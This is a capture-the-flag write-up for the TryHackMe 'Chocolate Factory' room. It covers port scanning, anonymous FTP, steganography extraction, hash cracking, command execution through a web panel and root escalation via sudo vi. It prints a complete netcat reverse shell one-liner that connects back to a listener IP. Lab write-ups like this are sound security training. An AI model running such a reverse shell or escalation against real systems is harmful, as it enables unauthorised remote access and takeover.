Chocolate Factory | THM
A Charlie And The Chocolate Factory themed room, revisit Willy Wonka’s chocolate factory!
Let’s begin this box
Usually starting with nmap scan,
nmap -sV -sC machine_IP
Taking peek into nmap scan result we can see port 22,21,80,100 are open, as mentioned in scan result port 21 has anonymous login, we proceed with enumeration on that port
further loging in into FTP with username and passwd as anonymous
we find a png image i’m curious is this some type of stegnography
let’s find out , sho i downloaded this image to my local machine
get file_name.png /local directory/filename.png
Let’s analyze the obtained file
this looks like chewing gums image..perhaps it’s always good habit to look into the image file don’t know what maybe hidden inside. So, now we can use steghide tool or any other tools of your choice..but I have selected Steghide and I’m going to proceed further with this tool
c’mon let’s reveal the hidden data .
++STEGNOGRAPHY with STEGHIDE++
steghide extract -sf file_name
voila as soon I pressed enter without any password it was accepted
further looking into the obtained file yea this is base64 hash Now we decode this and find what information is given . here we can use cyberchef for decoding the base64
Now we need to decrypt the hash so here I’m going to use hashcat to decrypt the given hash to get user charlie passwd
Now we have username and password so head to machine webpage and your greeted with this login page :
Enter your credentials and proceed
If my ‘ls’ command is working why I try other command and proceeding further I jus noticed a key file and submitted to related question as answer
So, commands are working ..then why not we proceed with some revershell
simultaneously We setup our net cat to listen the reverse_connection
here we go..
This reverse_shell script was taken from pentestmonkey
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Reverse Shell Cheat Sheet
If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…
after setting up port and machine_ip to netcat and reverse script
we got shell …horaaayyy…….
We don’t have permission to open the file
exploring each file in the directory
We proceed further by using this key we login as the given user
To check the permissions we type sudo -l . and Here we can Find that this particular user can execute “/user/bin/vi
I decided to take a look into gtfobins for escalation method
vi | GTFOBins
Modern Unix systems run binary when vi is called. It can be used to break out from restricted environments by spawning…
voila i’m root now we can cat the root.txt and we got our flag ::
executing root.py with python it prompt with “Enter the key”
as soon as we enter the obtained key it gives us flag.
Finally it’s Pwned and we obtained desired flag
revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa was nice. This was easy box which including all the entry level technique
thanks for reading ..
HAPPY HACKING !